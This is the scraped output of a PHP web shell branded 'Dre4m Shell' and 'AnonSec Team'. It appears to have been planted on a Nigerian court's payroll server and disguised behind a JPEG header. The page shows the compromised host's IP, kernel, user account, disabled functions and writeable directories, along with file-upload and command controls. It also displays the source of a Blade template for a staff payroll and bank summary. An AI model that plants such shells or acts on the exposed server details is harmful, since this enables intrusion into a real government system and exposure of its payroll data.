ÿØÿàJFIFÿáExifMM*ÿÛC  Dre4m Was Here
Dre4m Shell
Server IP : 199.250.214.225  /  Your IP : 13.59.61.147
Web Server : Apache
System : Linux vps64074.inmotionhosting.com 3.10.0-1160.105.1.vz7.214.3 #1 SMP Tue Jan 9 19:45:01 MSK 2024 x86_64
User : nicngo5 ( 1001)
PHP Version : 7.4.33
Disable Function : exec,passthru,shell_exec,system
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : OFF
Directory :  /home/nicngo5/grp.nicn.gov.ng/storage/framework/views/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : /home/nicngo5/grp.nicn.gov.ng/storage/framework/views/b0561c23c7e4017b6fa1170ba609aca6c82f8b78.php
<!DOCTYPE html
    PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
    <link rel="shortcut icon" href="images/favicon.ico">
    <title>COURT OF APPEAL</title>
    <link rel="stylesheet" href="<?php echo e(asset('assets/css/bootstrap.min.css')); ?>">
    <style type="text/css">
        body,
        td,
        th {
            font-size: 15px;
            font-family: Verdana, Geneva, sans-serif;
            margin: 15px;
        }

        .tables tr td,
        .tables {
            padding: 6px;
            border: 1px solid #333;
        }

        @media  print {

            .no-print,
            .no-print * {
                display: none !important;
            }
        }

        body {
            background-image: <?php echo e(asset('Images/nicn_bg.jpg')); ?>;
        }

        .style2 {
            color: #008000
        }
    </style>
    <style type="text/css">
        .head-color tr td,
        .table .th-row td {
            //color:#06c;

        }

        .table,
        .table tr td {
            //border: 1px solid #06C;
            //color:#06c;
        }
    </style>
    <script type="text/javascript" src="<?php echo e(asset('assets/js/number_to_word.js')); ?>"></script>

<body background="<?php echo e(asset('Images/nicn_bg.jpg')); ?>" onload="lookup(); gross();">
    <div align="center"><strong><span class="style2">
                <h3><br />
                    <br />
                    <br />
                    COURT OF APPEAL
                </h3>
                <?php if($mydivision): ?>
                    <h4>PAYROLL SUMMARY AND BANK ANALYSIS FOR STAFF</h4>
                    <h4>DIVISION:-<?php echo e(strtoupper($mydivision)); ?>, <?php echo e($month); ?> <?php echo e($year); ?></h4>
                <?php else: ?>
                    <h4>PAYROLL SUMMARY AND BANK ANALYSIS FOR STAFF</h4>
                    <h4>DIVISION:-ALL, <?php echo e($month); ?> <?php echo e($year); ?></h4>
                <?php endif; ?>

            </span>
        </strong></div>
    <br />


    <?php
        $bstotal = 0.0;
        $grosstotal = 0.0;
        $jusutotal = 0;
        $taxtotal = 0;
        $pentotal = 0;
        $nhftotal = 0;
        $otherearntotal = 0;
        $earntotal = 0;
        $deducttotal = 0;
        $netpaytotal = 0;
        $uniontotal = 0;
        $totalNetEmolu = 0;
        $totalAllowance = 0;
        $cooptotal = 0;
        $hstotal = 0;
        $saladvtotal = 0;
        $stafftotal = 0;
        $Earntotal = 0;
        $totalAdv = 0;
        $totalRefunds = 0;
        $alihsantotal = 0;
    ?>

    <div align="left"><strong>

        </strong></div>
    <div align="right">

        <table class="table table-condense table-responsive" width="1586" border="1" align="center"
            cellpadding="0" cellspacing="0" id="tableData">
            <tr>
                <td><strong>SN</strong></td>
                <td><strong>PV No</strong></td>
                <td><strong>PAYEE</strong></td>
                <td><strong>NO OF STAFF</strong></td>
                <td><strong>BANK</strong></td>
                <td><strong>GROSS SALARY</strong></td>
                <td><strong> DEDUCTION </strong></td>
                <td><strong> AMOUNT </strong></td>
            </tr>
            

            <?php if(isset($allBanks) && $allBanks): ?>
                <?php $__currentLoopData = $allBanks; $__env->addLoop($__currentLoopData); foreach($__currentLoopData as $key => $eachBank): $__env->incrementLoopIndices(); $loop = $__env->getLastLoop(); ?>
                    <tr>
                        <td><?php echo e($key + 1); ?></td>
                        <td></td>

                        <?php if($staffInBank[$eachBank->bank] == 1): ?>
                            <td><?php echo e($staffName[$eachBank->bank]->name); ?>

                            </td>
                        <?php else: ?>
                            <td><?php echo e($staffName[$eachBank->bank]->name); ?> & <?php echo e($staffInBank[$eachBank->bank] - 1); ?>

                                OTHERS </td>
                        <?php endif; ?>

                        <td><?php $stafftotal += $staffInBank[$eachBank->bank]; ?><?php echo e($staffInBank[$eachBank->bank]); ?></td>
                        <td><?php echo e($eachBank->bank_name); ?></td>

                        <td>
                            <?php $Earntotal += $variableElement[$eachBank->bank]->totalNetPay + $variableElement[$eachBank->bank]->totalTD; ?>
                            <?php echo e(number_format($variableElement[$eachBank->bank]->totalNetPay + $variableElement[$eachBank->bank]->totalTD, 2)); ?>

                        </td>
                        <td><?php $deducttotal += $variableElement[$eachBank->bank]->totalTD; ?><?php echo e(number_format($variableElement[$eachBank->bank]->totalTD, 2)); ?></td>
                        <td><?php $netpaytotal += $variableElement[$eachBank->bank]->totalNetPay; ?><?php echo e(number_format($variableElement[$eachBank->bank]->totalNetPay, 2)); ?>

                        </td>
                    </tr>

                    
                <?php endforeach; $__env->popLoop(); $loop = $__env->getLastLoop(); ?>
            <?php endif; ?>

            <tr>
                <td colspan="3"><strong>Total</strong></td>
                <td><strong><?php echo e($stafftotal); ?></strong></td>
                <td><strong></strong></td>
                <td><strong><?php echo e(number_format($netpaytotal + $deducttotal, 2)); ?></strong></td>
                <td><strong><?php echo e(number_format($deducttotal, 2)); ?></strong></td>
                <td><strong><?php echo e(number_format($netpaytotal, 2)); ?></strong></td>
            </tr>

            

            

            <tr border="0" class="no-print">
                <td colspan="17">
                    <div class="no-print" align="center">
                        <input type="button" class="hidden-print" id="btnExport" value="Export to Excel"
                            onclick="ExportToExcel('xlsx')" />
                    </div>
                </td>
            </tr>

        </table>

        <p>&nbsp;</p>
    </div>




    <div>
        <h2>
            <a class="no-print" type="submit" class="btn btn-success btn-sm pull-right"
                href="<?php echo e(url('/payroll/summary/analysis')); ?>">Back</a>
        </h2>
    </div>

    <script src="<?php echo e(asset('assets/js/jQuery-2.2.0.min.js')); ?>"></script>
    <script src="<?php echo e(asset('assets/js/table2excel.js')); ?>"></script>

    <script type="text/javascript">
        function ExportToExcel() {
            //$("#btnExport").hide();
            $("#tableData").table2excel({
                filename: "<?php echo e(session('month')); ?>_<?php echo e(session('year')); ?>_Mandate.xls"
            });
            $("#tableData").excelexportjs({
                containerid: "tableData",
                datatype: 'table'
            });
            //$("#btnExport").show();
        }
    </script>

</body>

</html>
<?php /**PATH C:\xampp\htdocs\nicngrp\resources\views/summary/summaryanalysis.blade.php ENDPATH**/ ?>

Anon7 - 2022
AnonSec Team